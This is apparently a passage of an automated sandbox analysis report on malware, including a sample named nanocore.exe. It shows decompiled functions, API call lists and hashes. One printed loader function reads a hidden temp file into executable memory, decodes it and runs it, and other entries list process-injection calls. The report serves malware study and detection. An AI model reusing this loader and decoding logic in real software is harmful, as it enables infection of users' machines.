				 *0x4093ef = 1;
				 *0x4093ec = _t11 & 0x00000001;
				 *0x4093ed = _t11 & 0x00000002;
				 *0x4093ee = _t11 & 0x00000004;
				E004059E1(_t18, _t24, _t26, 0x4093f4,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x4093d8);
				_push(_t14);
				_push(_t26);
				E0040591D();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











            0x00401d9c
            0x00401db5
            0x00401dbf
            0x00401dc4
            0x00401dcf
            0x00401dd6
            0x00401de8
            0x00401dee
            0x00401df3
            0x00401dfd
            0x00402536
            0x00401581
            0x004028d7
            0x00402932
            0x0040293e

            APIs
            • GetDC.USER32(?), ref: 00401D95
            • GetDeviceCaps.GDI32(00000000), ref: 00401D9C
            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401DAB
            • CreateFontIndirectA.GDI32(004093D8), ref: 00401DFD
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: CapsCreateDeviceFontIndirect
            • String ID:
            • API String ID: 3272661963-0
            • Opcode ID: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
            • Instruction ID: 1900d90730e4b23e0012eb78001e2751c68d3a10a93a8e7648ac2a5c53f67619
            • Opcode Fuzzy Hash: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
            • Instruction Fuzzy Hash: 98F0C870948340EFEB009B70AEAEB9A3F649719301F144479FA41B61E3C6BC18008F3E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004020A6, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132comCOMMON
            Download Yara Rule
            C-Code - Quality: 74%
            			E004020A6(void* __eflags) {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A9A(0xfffffff0);
				_t96 = E00402A9A(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E00402A9A(2);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A9A(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E00402A9A(0x45);
				if(E00405538(_t96) == 0) {
					E00402A9A(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407324, _t75, 1, 0x407314, _t44);
				if(_t44 < _t75) {
					L12:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407334, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x34)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x34)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							 *0x409418 = _t75;
							MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409418, 0x400);
							_t69 =  *((intOrPtr*)(_t100 - 8));
							_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409418, 1);
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L12;
					}
				}
				E00401428();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















            0x004020af
            0x004020b9
            0x004020c2
            0x004020cc
            0x004020d5
            0x004020df
            0x004020e3
            0x004020e3
            0x004020e8
            0x004020f9
            0x00402101
            0x004021df
            0x004021df
            0x004021e6
            0x00402107
            0x00402107
            0x00402118
            0x0040211c
            0x00402122
            0x0040212c
            0x0040212e
            0x00402139
            0x0040213c
            0x00402149
            0x0040214b
            0x0040214d
            0x00402154
            0x00402157
            0x00402157
            0x0040215a
            0x00402164
            0x0040216c
            0x00402171
            0x0040217d
            0x0040217d
            0x00402180
            0x00402189
            0x0040218c
            0x00402195
            0x0040219a
            0x004021ac
            0x004021b5
            0x004021bb
            0x004021c7
            0x004021c7
            0x004021c9
            0x004021cf
            0x004021cf
            0x004021d2
            0x004021d8
            0x004021dd
            0x004021f2
            0x00000000
            0x00000000
            0x00000000
            0x004021dd
            0x004021e8
            0x00402932
            0x0040293e

            APIs
            • CoCreateInstance.OLE32(00407324,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020F9
            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409418,00000400,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021B5
            Strings
            • C:\Users\user\AppData\Local\Temp, xrefs: 00402131
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: ByteCharCreateInstanceMultiWide
            • String ID: C:\Users\user\AppData\Local\Temp
            • API String ID: 123533781-47812868
            • Opcode ID: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
            • Instruction ID: 6da020dad1963d07c1d5d6cba7c730fbb78a3e39a4a6f028781d9f3b25516250
            • Opcode Fuzzy Hash: 751c6343f30b53ff87cb2a36cb9a8fc5fe581f53ea8e30dae2934d6634253110
            • Instruction Fuzzy Hash: 0D417D75A00215BFCB00DFA8CD88E9E7BB6FF89315B20416AF905EB2D1CA759D41CB64
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00404CA1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61windowCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00404CA1(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t19;
				long _t23;

				if(_a8 != 0x102) {
					__eflags = _a8 - 2;
					if(_a8 == 2) {
						 *0x40929c =  *0x40929c | 0xffffffff;
						__eflags =  *0x40929c;
					}
					__eflags = _a8 - 0x200;
					if(_a8 != 0x200) {
						_t23 = _a16;
						goto L9;
					} else {
						_t19 = IsWindowVisible(_a4);
						__eflags = _t19;
						if(_t19 == 0) {
							L12:
							_t23 = _a16;
							L13:
							return CallWindowProcA( *0x79f574, _a4, _a8, _a12, _t23);
						}
						_t23 = E00404627(_a4, 1);
						_a8 = 0x419;
						L9:
						__eflags = _a8 - 0x419;
						if(_a8 == 0x419) {
							__eflags =  *0x40929c - _t23; // 0xffffffff
							if(__eflags != 0) {
								 *0x40929c = _t23;
								E004059BF(0x79f580, 0x7a4000);
								E0040591D(0x7a4000, _t23);
								E00401410(6);
								E004059BF(0x7a4000, 0x79f580);
							}
						}
						goto L13;
					}
				}
				if(_a12 == 0x20) {
					E00403DF3(0x413);
					return 0;
				}
				goto L12;
			}





            0x00404cad
            0x00404cca
            0x00404cce
            0x00404cd0
            0x00404cd0
            0x00404cd0
            0x00404cd7
            0x00404ce3
            0x00404d03
            0x00000000
            0x00404ce5
            0x00404ce8
            0x00404cee
            0x00404cf0
            0x00404d43
            0x00404d43
            0x00404d46
            0x00000000
            0x00404d56
            0x00404cfc
            0x00404cfe
            0x00404d06
            0x00404d06
            0x00404d09
            0x00404d0b
            0x00404d11
            0x00404d20
            0x00404d26
            0x00404d2d
            0x00404d34
            0x00404d3b
            0x00404d40
            0x00404d11
            0x00000000
            0x00404d09
            0x00404ce3
            0x00404cb3
            0x00404cbe
            0x00000000
            0x00404cc3
            0x00000000

            APIs
            • IsWindowVisible.USER32(?), ref: 00404CE8
            • CallWindowProcA.USER32 ref: 00404D56
              • Part of subcall function 00403DF3: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E05
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: Window$CallMessageProcSendVisible
            • String ID:
            • API String ID: 3748168415-3916222277
            • Opcode ID: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
            • Instruction ID: cd4a28475afe767821094f105493c38d9b2306f15ef4c86c27c070550bfeb3f9
            • Opcode Fuzzy Hash: cefab2168f48871b8545a6b63d0f5fbb3bce144958928b992ab0555d20261f65
            • Instruction Fuzzy Hash: E111AF71500208FBDF219F11ED41A9B3725AF81365F00803AFA197A1E1C37D8E50CF59
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040253C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0040253C(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E00402A9A(0x11));
				} else {
					E00402A7D(1);
					 *0x40a018 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405936(_t17 + 8, _t15), "C:\Users\jones\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









            0x0040253c
            0x0040253c
            0x0040253f
            0x0040255a
            0x00402541
            0x00402543
            0x00402548
            0x0040254f
            0x00402561
            0x004026da
            0x004026da
            0x00402567
            0x00402579
            0x004015c8
            0x004015ca
            0x00000000
            0x004015d0
            0x004015ca
            0x00402932
            0x0040293e

            APIs
            • lstrlenA.KERNEL32(00000000,00000011), ref: 0040255A
            • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll,00000000,?,?,00000000,00000011), ref: 00402579
            Strings
            • C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll, xrefs: 00402548, 0040256D
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: FileWritelstrlen
            • String ID: C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll
            • API String ID: 427699356-2804884011
            • Opcode ID: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
            • Instruction ID: abda26b523758e5a68d3ba22bbd8f990d4e7ca5ce812059aa2e21876e1d05e71
            • Opcode Fuzzy Hash: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
            • Instruction Fuzzy Hash: EDF0E971A04244FED710EFA49D19AAF37649B11344F10443BB102F50C2D5BC4A455B6E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00405513, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00405513(char* _a4) {
				char* _t3;
				char* _t4;

				_t4 = _a4;
				_t3 =  &(_t4[lstrlenA(_t4)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t4, _t3);
					if(_t3 > _t4) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return _t3;
			}





            0x00405514
            0x0040551e
            0x00405520
            0x00405527
            0x0040552f
            0x00000000
            0x00000000
            0x00000000
            0x0040552f
            0x00405531
            0x00405535

            APIs
            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405519
            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405527
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: CharPrevlstrlen
            • String ID: C:\Users\user\Desktop
            • API String ID: 2709904686-224404859
            • Opcode ID: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
            • Instruction ID: 9a19af462094a1157adf0a1695e347c504c30875ce7c89a43b2e01bcf73e6b15
            • Opcode Fuzzy Hash: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
            • Instruction Fuzzy Hash: 41D0A7B2409D706EE3031214DC04B8F7A488F17320F0904A2F040A61E5C2780C418BBD
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00405624, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00405624(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






            0x00405630
            0x00405632
            0x0040565a
            0x0040563f
            0x00405644
            0x0040564f
            0x00000000
            0x0040566c
            0x00405658
            0x00405658
            0x00000000

            APIs
            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
            • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405644
            • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405652
            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: lstrlen$CharNextlstrcmpi
            • String ID:
            • API String ID: 190613189-0
            • Opcode ID: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
            • Instruction ID: 467c7d4f976b1c4b769b407f61edba7cefb266b08e25db718ea0bc1606fb1982
            • Opcode Fuzzy Hash: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
            • Instruction Fuzzy Hash: 3DF0A736249D91AAC2126B359C04E6F7F94EF92325B68097AF444F2140D73A9C119BBB
            Uniqueness

            Uniqueness Score: -1.00%

            Analysis Process: dhcpmon.exe PID: 5752 Parent PID: 968 dhcpmon.exeCOMMON

            Executed Functions

            Function 6EDA1000, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85filememorystringCOMMON
            Download Yara Rule
            C-Code - Quality: 82%
            			E6EDA1000() {
				long _v8;
				short _v528;
				long _t12;
				void* _t16;
				signed char _t23;
				void* _t35;
				long _t38;

				_v8 = 0;
				if(IsDebuggerPresent() != 0) {
					DebugBreak();
				}
				_t12 = GetTempPathW(0x103,  &_v528);
				if(_t12 != 0) {
					lstrcatW( &_v528, L"\\ks446tcfy17w7jqy3r");
					_t16 = CreateFileW( &_v528, 0x80000000, 7, 0, 3, 0x80, 0); // executed
					_t35 = _t16;
					if(_t35 == 0xffffffff) {
						L12:
						return _t16;
					}
					_t16 = GetFileSize(_t35, 0);
					_t38 = _t16;
					if(_t38 == 0xffffffff) {
						L11:
						goto L12;
					}
					_t16 = VirtualAlloc(0, _t38, 0x3000, 0x40); // executed
					 *0x6eda3000 = _t16;
					if(_t16 == 0) {
						goto L11;
					}
					_t16 = ReadFile(_t35, _t16, _t38,  &_v8, 0); // executed
					if(_t16 == 0) {
						goto L11;
					}
					_t23 = 0;
					if(_v8 <= 0) {
						L10:
						_t16 =  *0x6eda3000(); // executed
						goto L11;
					}
					do {
						asm("rol cl, 0x2");
						 *((char*)( *0x6eda3000 + _t23)) = (0x00000082 - (( !( *((intOrPtr*)( *0x6eda3000 + _t23)) + 0x00000003 ^ 0x0000006a) ^ 0x000000e1) - _t23 ^ _t23) ^ 0x00000068) - 1 + _t23;
						_t23 = _t23 + 1;
					} while (_t23 < _v8);
					goto L10;
				}
				return _t12;
			}










            0x6eda1009
            0x6eda1018
            0x6eda101a
            0x6eda101a
            0x6eda102c
            0x6eda1034
            0x6eda1047
            0x6eda1066
            0x6eda106c
            0x6eda1071
            0x6eda10f6
            0x00000000
            0x6eda10f6
            0x6eda107b
            0x6eda1081
            0x6eda1086
            0x6eda10f5
            0x00000000
            0x6eda10f5
            0x6eda1092
            0x6eda1098
            0x6eda109f
            0x00000000
            0x00000000
            0x6eda10aa
            0x6eda10b2
            0x00000000
            0x00000000
            0x6eda10b5
            0x6eda10ba
            0x6eda10ee
            0x6eda10ee
            0x00000000
            0x6eda10f4
            0x6eda10c0
            0x6eda10d3
            0x6eda10e5
            0x6eda10e8
            0x6eda10e9
            0x00000000
            0x6eda10c0
            0x6eda10fa

            APIs
            • IsDebuggerPresent.KERNEL32 ref: 6EDA1010
            • DebugBreak.KERNEL32 ref: 6EDA101A
            • GetTempPathW.KERNEL32(00000103,?), ref: 6EDA102C
            • lstrcatW.KERNEL32(?,\ks446tcfy17w7jqy3r), ref: 6EDA1047
            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6EDA1066
            • GetFileSize.KERNEL32(00000000,00000000), ref: 6EDA107B
            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 6EDA1092
            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 6EDA10AA
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.672681692.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
            • Associated: 00000009.00000002.672668724.000000006EDA0000.00000002.00020000.sdmp Download File
            • Associated: 00000009.00000002.672759456.000000006EDA2000.00000002.00020000.sdmp Download File
            • Associated: 00000009.00000002.672835867.000000006EDA4000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: File$AllocBreakCreateDebugDebuggerPathPresentReadSizeTempVirtuallstrcat
            • String ID: \ks446tcfy17w7jqy3r
            • API String ID: 4020703165-2035310939
            • Opcode ID: c0ac04641a4bec83ef60dcce876c5f90c1dd83d5b5f2eaff06d607942352595f
            • Instruction ID: 06c16a8111ad777526f6d6e92f8bf485bc520e8ec9eaadef0395d3d6e3291a7d
            • Opcode Fuzzy Hash: c0ac04641a4bec83ef60dcce876c5f90c1dd83d5b5f2eaff06d607942352595f
            • Instruction Fuzzy Hash: AA212474601211ABFB205BBACC6DBAE7B68EB03754F104250E765E31C0DA34930ACA68
            Uniqueness

            Uniqueness Score: -1.00%

            Function 025411EB, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 350memoryfileCOMMON
            Download Yara Rule
            APIs
            • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 02541520
            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0254157F
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.670525727.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
            Similarity
            • API ID: AllocCreateFileVirtual
            • String ID: b1a2f4be1bb040dfae4382b4765a8fb2
            • API String ID: 1475775534-2543734446
            • Opcode ID: 3e9eb696310382312a471573b98bb606ff28a96822e7d8fdb3900a6b8a597b0b
            • Instruction ID: ea156400b41995e1e225b039b34c7e1e53f6eedc781307ca10d75e46920ed1fd
            • Opcode Fuzzy Hash: 3e9eb696310382312a471573b98bb606ff28a96822e7d8fdb3900a6b8a597b0b
            • Instruction Fuzzy Hash: F6E14835E44388EDEB21DBE4DC05FEDBBB5AF04714F10849AE608FA191D7B50A84DB1A
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02540719, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
            Download Yara Rule
            APIs
            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 0254081B
            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 025409E8
            Memory Dump Source
            • Source File: 00000009.00000002.670525727.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
            Similarity
            • API ID: CreateFileFreeVirtual
            • String ID:
            • API String ID: 204039940-0
            • Opcode ID: f7d36a05684a882bf25a7b393b28ed484d6d346c480faf729b79359556833635
            • Instruction ID: cb5ea9eaaeb3ac69c554c610fd0fedc488a083ce74010002ec2f41976b3ce809
            • Opcode Fuzzy Hash: f7d36a05684a882bf25a7b393b28ed484d6d346c480faf729b79359556833635
            • Instruction Fuzzy Hash: 7DA1F034D00209EFEF14CFA4C985BADFBB1BF08319F208459E614BA2A0DB755A81DF18
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02540034, Relevance: 6.6, APIs: 4, Instructions: 558processthreadCOMMON
            Download Yara Rule
            APIs
            • CreateProcessW.KERNELBASE(?,00000000), ref: 02540387
            • GetThreadContext.KERNELBASE(?,00010007), ref: 025403AA
            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 025403CE
            Memory Dump Source
            • Source File: 00000009.00000002.670525727.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
            Similarity
            • API ID: Process$ContextCreateMemoryReadThread
            • String ID:
            • API String ID: 2411489757-0
            • Opcode ID: 77bae4deecc96b6b8a38a97f574745c36a5dc0c9e54112462e98fa6dc6f452fc
            • Instruction ID: ce9d995eb9b95f4caf7898c769eb61ef5760a2629cae33401d3386cb3bb4ebdf
            • Opcode Fuzzy Hash: 77bae4deecc96b6b8a38a97f574745c36a5dc0c9e54112462e98fa6dc6f452fc
            • Instruction Fuzzy Hash: 9D320931E50218EEEB24CB94DC45FADBBB5BF44708F204496E609FA2E0DB705A85DF19
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Analysis Process: nanocore.exe PID: 5904 Parent PID: 4108 nanocore.exeCOMMON

            Executed Functions

            Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}




            0x00401e22
            0x00401e28

            APIs
            • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
            Memory Dump Source
            • Source File: 0000000A.00000001.662833813.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp Download File
